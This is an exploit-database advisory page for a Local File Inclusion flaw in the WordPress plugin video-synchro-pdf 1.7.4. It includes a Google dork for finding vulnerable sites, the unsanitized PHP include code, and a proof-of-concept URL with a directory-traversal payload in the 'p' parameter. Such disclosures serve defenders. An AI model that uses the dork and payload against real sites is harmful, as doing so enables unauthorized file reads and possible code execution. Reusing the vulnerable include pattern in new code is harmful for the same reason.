header-logo
Suggest Exploit
vendor:
video-synchro-pdf
by:
Hassan Khan Yusufzai - Splint3r7
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: video-synchro-pdf
Affected Version From: 1.7.2004
Affected Version To: 1.7.2004
Patch Exists: NO
Related CWE:
CPE: a:wordpress:wordpress_plugin:video-synchro-pdf
Metasploit:
Other Scripts:
Platforms Tested: Firefox
2022

WordPress Plugin video-synchro-pdf 1.7.4 – Local File Inclusion

The WordPress Plugin video-synchro-pdf version 1.7.4 is vulnerable to Local File Inclusion. The vulnerable code is present in the file video-synchro-pdf/reglages/Menu_Plugins/tout.php. The code does not properly validate user input and allows an attacker to include arbitrary files from the local system. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'p' parameter. This will allow the attacker to read the contents of the file and potentially execute arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly validated and sanitized before being used in any file operations.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox

# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code:

```
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:

http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]

Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>

Navigation

Suggest Exploit

Services By CQR